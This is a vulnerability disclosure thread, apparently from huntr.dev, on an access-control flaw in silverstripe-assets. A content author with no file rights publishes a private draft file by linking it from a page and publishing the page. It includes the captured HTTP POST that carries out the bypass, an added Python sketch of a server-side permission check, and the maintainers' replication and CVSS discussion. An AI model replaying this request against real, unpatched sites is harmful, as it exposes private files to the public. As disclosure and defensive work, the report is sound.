unprivileged user can publish a private file in silverstripe/silverstripe-assets
Reported on
Mar 27th 2022
Description
A user who has no access to files at all can publish a file, after which an unauthenticated user can download that file.
Proof of Concept
1. From the admin account, add a new user called user-B in the Content Authors group.
Give user-B permission to the Pages section only. Do not give any Files permission.
user-B should therefore not be able to access files.
2. From the admin account, go to http://localhost/silverstripe/admin/assets/ and upload a file. Do not publish this file.
user-B should not be able to access this file.
Let the file ID be 23.
3. Now log in as user-B, edit any page, attach the file to this page and publish the page.
The following request is sent to the server:
POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1925
Origin: http://193.37.215.120
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie:
Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=<p><a href="[file_link,id=23]">sd</a><a>mjkhkh</a></p><p>&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=2a6bce172bfb6110234a0460ffecd38ba1bf0ec3&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2F193.37.215.120%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_publish=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7
In this request, check the value of the Content parameter: <p><a href="[file_link,id=23]">sd</a><a>mjkhkh</a></p><p>. Here user-B attached the file whose ID is 23.
After the page is published, the file above is published as well, by user-B.
user-B has no permission in the Files section but can still publish that file via the request above, simply by attaching it to a page.
4. Any external unauthenticated user who visits the page above now sees the file link and can download the file using a URL like https://localhost/silverstripe/assets/extention_brute.txt .
So user-B can publish a file even though they have no permission in Files.
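The script below is an added illustration and is not Silverstripe's code or the reporter's. It models the check that the steps above argue is missing: the `Content` field of a page-edit POST body is parsed, the file IDs carried by `[file_link,id=N]` and `[image ... id=N]` shortcodes are extracted, and a publish is refused when the page would drag a still-unpublished file live on behalf of an author who may not publish files. The form body, the `FileRecord`/`Author` types and the sample users are constructed for the example; the permission code `FILE_EDIT_ALL` is assumed to be Silverstripe's code for "Edit any file", the rule built around it is ours.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Shortcodes in page content that make the page reference a file. [file_link]
# is the tag seen in the captured request; image/embed are included so the
# same walk covers inline images. The permission model below is constructed.
_SHORTCODE_RE = re.compile(r"\[(file_link|image|embed)\b([^\]]*)\]")
_ID_RE = re.compile(r"\bid\s*=\s*\"?(\d+)\"?")

# Assumed to be Silverstripe's permission code for "Edit any file".
EDIT_ANY_FILE = "FILE_EDIT_ALL"


@dataclass
class FileRecord:
    id: int
    name: str
    published: bool  # False = draft, only reachable by authorised CMS users


@dataclass
class Author:
    name: str
    permissions: set[str] = field(default_factory=set)


def file_ids_in_content(form_body: str) -> set[int]:
    """Extract the IDs of every file the Content form field references."""
    fields = parse_qs(form_body, keep_blank_values=True)
    content = fields.get("Content", [""])[0]
    ids: set[int] = set()
    for _tag, attrs in _SHORTCODE_RE.findall(content):
        match = _ID_RE.search(attrs)
        if match:
            ids.add(int(match.group(1)))
    return ids


def can_publish_file(author: Author, record: FileRecord) -> bool:
    """Constructed rule: publishing a draft file needs an explicit file permission."""
    return EDIT_ANY_FILE in author.permissions


def publish_decision(form_body: str, author: Author,
                     files: dict[int, FileRecord]) -> tuple[bool, set[int]]:
    """Decide whether a page-edit POST may go ahead as a publish.

    Returns (allowed, blocked_ids). A plain save (no action_publish) exposes
    nothing and is always allowed. A publish is refused when the page
    references a file that is still a draft and the author may not publish
    files; otherwise the page publish would carry the draft file into the
    public asset store on the author's behalf.
    """
    fields = parse_qs(form_body, keep_blank_values=True)
    if "action_publish" not in fields:
        return True, set()
    blocked: set[int] = set()
    for file_id in file_ids_in_content(form_body):
        record = files.get(file_id)
        if record is None or record.published:
            continue  # unknown, or already live: exposure does not change
        if not can_publish_file(author, record):
            blocked.add(file_id)
    return not blocked, blocked


# Constructed sample data mirroring the report: file 23 is an unpublished
# upload, file 24 is already live, user-B has page rights but no file rights.
FILES = {
    23: FileRecord(23, "extention_brute.txt", published=False),
    24: FileRecord(24, "banner.png", published=True),
}
USER_B = Author("user-B")
ADMIN = Author("admin", {EDIT_ANY_FILE})

# Constructed form body; the Content field URL-encodes
# <p><a href="[file_link,id=23]">sd</a>[image src="/assets/banner.png" id="24"]</p>
PUBLISH_BODY = (
    "Title=New+Page&URLSegment=new-page&ID=7"
    "&Content=%3Cp%3E%3Ca+href%3D%22%5Bfile_link%2Cid%3D23%5D%22%3Esd%3C%2Fa%3E"
    "%5Bimage+src%3D%22%2Fassets%2Fbanner.png%22+id%3D%2224%22%5D%3C%2Fp%3E"
    "&action_publish=1"
)
SAVE_BODY = PUBLISH_BODY.replace("&action_publish=1", "&action_save=1")

if __name__ == "__main__":
    print(file_ids_in_content(PUBLISH_BODY))              # {23, 24}
    print(publish_decision(PUBLISH_BODY, USER_B, FILES))  # (False, {23})
    print(publish_decision(PUBLISH_BODY, ADMIN, FILES))   # (True, set())
    print(publish_decision(SAVE_BODY, USER_B, FILES))     # (True, set())
```

The point of the example is that the authorisation question is asked per referenced file, not only for the page: a server-side guard placed at the top of the publish action would walk the same shortcodes and refuse the request for user-B while letting the admin through.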
Impact
An unprivileged user can publish a private (unpublished) file despite having no permission in the Files section; once published, the file can be downloaded by unauthenticated users.
Thanks for submitting this, we have replicated the issue at our end
I wasn't able to fully replicate publishing files, though there was an issue where protected images were viewable to users who should not have been able to see them
Could you please confirm if you'd like to be acknowledged in the official disclosure? Would crediting you as follows be OK?
ranjit-git via huntr.dev
Regards Steve Boyd Silverstripe Product Developer
We are still having internal discussions about this one as we have not fully replicated the original issue
Regards Steve Boyd Silverstripe Product Developer
On the video you provided, user11 / bug@localhost.com has the permission "Edit any file" - this essentially means they do have enough permissions to view and publish protected files. Therefore the issue as originally reported, where unprivileged users can publish protected files, isn't accurate.
While investigating this issue though, there was a related issue uncovered where protected images (not files like PDFs though) are able to be viewed in the CMS by users that shouldn't have permission to view them, by sending an XHR request as described. They still cannot publish them to the public asset store though. We have developed a fix internally for this which should be released in a month or two.
We've internally assessed the CVE for this at 3.9, so I'll change the assessment on this issue accordingly.
Regards Steve Boyd Silverstripe Product Developer
Sorry by CVE for this at 3.9 I meant we assessed the CVSS as a 3.9.
Regards Steve Boyd Silverstripe Product Developer
This isn't letting me change the severity from 7.1 (high) to 3.9 (low) - could you please do this for me? I'm happy to confirm this once that's done
Regards Steve Boyd Silverstripe Product Developer
@maintainer
On the video you provided, user11 / bug@localhost.com has the permission "Edit any file" - this essentially means they do have enough permissions to view and publish protected files.
Sorry, I made a mistake in that video.
user11/bug@localhost.com does not need the Edit any file permission.
I forgot to revoke that permission from user11.
You can revoke that permission and this bug is still reproducible.
Can you please recalculate the CVSS score?
If the severity remains the same then I will change the severity to your provided CVSS score.
So, user11/bug@localhost.com does not have the Files section and Edit any file permissions.
Now user-B is fully unprivileged to publish a file, but using this bug he can publish.
Here is the correct video PoC:
https://drive.google.com/file/d/1pm_qb-pa_2mrm432SrjXSH5LCDLjygEu/view?usp=sharing
@maintainer sorry about the inability to assess the CVSS manually, we will deliver this functionality very soon.
In the meantime can you please tell us what vectors you used that led to a CVSS of 3.1? We will adjust it from our end :)
@ranjit-git - the new video posted is literally just an admin user publishing a file with no special permissions on it.
@pavlos - https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C&version=3.1
Regards Steve Boyd Silverstripe Product Developer
@maintainer I think you did not watch the video carefully. In this video user11 is a content author. I think you might have been confused because I recorded the video in the same browser. Actually, in my Firefox browser I use two accounts: one for admin in normal mode, another one for the content author in container-1. You might have assumed both accounts are the same.
You can even reproduce the bug yourself. Create a user with content-author permission, then revoke the Files section permission and revoke the Edit any file permission. This user can publish a file using this bug.
Just give me another chance, I will properly make a video with written steps. Within an hour I will upload a video.
VIDEO POC
https://drive.google.com/file/d/1uiMYZYq1XOquuWQLivLUV2a-KMS_1yzx/view
My steps:
- admin adds a user to the content-author group.
- revoke the following permissions for the content-author group: Files section permission and Edit any file permission.
- go to the content-author user account and publish the file like in my video.
Please let me know your final decision and final CVSS score.
@maintainer I have adjusted to your provided CVSS score https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C&version=3.1 Please let me know if there is any issue.
@Pavlos
I'd like to mark as fixed, though the fix is in silverstripe/assets, not silverstripe/framework
Fixed in version: 1.10.1
SHA: 5f6a73b010c01587ffbfb954441f6b7cbb54e767
Who should get rewarded for the patch: Nobody
